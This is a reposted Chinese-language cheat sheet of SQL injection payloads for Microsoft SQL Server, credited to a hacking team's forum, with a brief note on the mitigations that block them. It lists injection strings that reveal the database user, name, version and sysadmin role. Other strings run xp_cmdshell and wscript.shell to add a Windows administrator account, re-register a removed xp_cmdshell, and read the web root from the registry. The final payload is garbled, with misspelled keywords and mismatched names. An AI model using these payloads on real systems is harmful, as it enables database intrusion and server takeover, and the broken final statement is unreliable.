
[转载]SQL基本语言

[转载]SQL基本语言

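信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

说明:以下语句均针对 Microsoft SQL Server,只有在应用把用户输入直接拼接进 SQL 语句时才会生效;使用参数化查询、以非 sysadmin 的最小权限账户连接数据库,并保持 xp_cmdshell 与 OLE Automation 过程处于禁用状态,可使这些探测与命令执行失效。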

' and 0<>user_name()-- [查看用户]
' and 0<>db_name()-- [查看库名]
' and 1=(SELECT IS_SRVROLEMEMBER('sysadmin')) [判断是否是sysadmin权限]
' and 'sa'=(SELECT System_user)  [判断是否是SA用户]
' and 0<>(select @@version)-- [查看系统版本]
  ;use model-- [查看数据库角色]
' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)---- [查看表名]

;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user admin /add' [建立用户]

;exec master..xp_cmdshell"net user admin /add"-- [添加用户]
;exec master..xp_cmdshell"net localgroup administrators admin /add"-- [提升用户]

and 1=(select IS_SRVROLEMEMBER('sysadmin')) [检测权限 sysadmin]

;exec master..xp_cmdshell 'dir c:\' [XP_CMDSHELL检测]

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell') [xp_cmdshell是否被删除]

;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll' [恢复 XP_CMDSHELL]

;CRE-ATE TABLE newtable(id int IDENTITY(1,1),paths varhar(500)) Declare @test varchar(2) exec master..xp_regread @ rootkey='HKEY_LOCAL_MACHINE',@key='SYSTEM\CunentControlset\Services\W3SVC\Parameters\VirtualRoots\', @value_name='/', values=@test output insert into paths(path) values(@test)  [暴网站地址]
www.dirshell.com/thenines
